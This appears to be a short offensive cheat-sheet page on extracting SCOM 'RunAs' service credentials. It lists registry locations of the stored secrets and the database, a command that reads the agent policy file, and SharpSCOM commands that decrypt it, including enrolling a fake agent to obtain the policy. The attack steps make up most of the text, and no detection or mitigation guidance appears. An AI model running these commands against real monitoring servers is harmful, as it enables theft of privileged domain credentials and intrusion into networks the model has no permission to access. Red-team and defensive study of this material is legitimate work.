Deployment - SCOM
Microsoft SCOM (System Center Operations Manager) is a monitoring tool used to oversee the health and performance of servers, applications, and infrastructure in IT environments. It collects data from systems, generates alerts for issues, and provides dashboards and reports for administrators.
Tools
- breakfix/SharpSCOM - A C# utility for interacting with SCOM.
- nccgroup/SCOMDecrypt - SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers.
SCOM “RunAs” credentials
Recovery from SCOM database
The location of the SCOM database containing the RunAs credentials can be found by querying the following registry keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName
Decrypt the stored credentials stored inside the SCOM management server database:
Recovery via Registry
Stored at HKLM\SYSTEM\CurrentControlSet\Services\HealthService\Parameters\Management Groups\$MANAGEMENT_GROUP$\SSDB\SSIDs\.
Recovery via Policy File
Use DPAPI to decrypt the RunAs credential from the policy.
cat C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Connector Configuration Cache\$MANAGEMENT_GROUP_NAME$\OpsMgrConnector.Config
SharpSCOM DecryptPolicy /data:<base64-encrypted-data>
Recovery after enrolling a new agent
Requirements:
- Management group name:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HealthService\Parameters\Management Groups\*
SharpSCOM.exe autoenroll /managementgroup:SCOM1 /server:scom.domain.lab /hostname:fake1.domain.lab /outfile:C:\Users\admin\desktop\policy_new.xml
# After enrolling a new agent, the attacker can decrypt the policy
SharpSCOM.exe decryptpolicy /data:"DAEAAA<REDACTED> /key:<RSAKeyValue><Modulus><REDACTED></D></RSAKeyValue>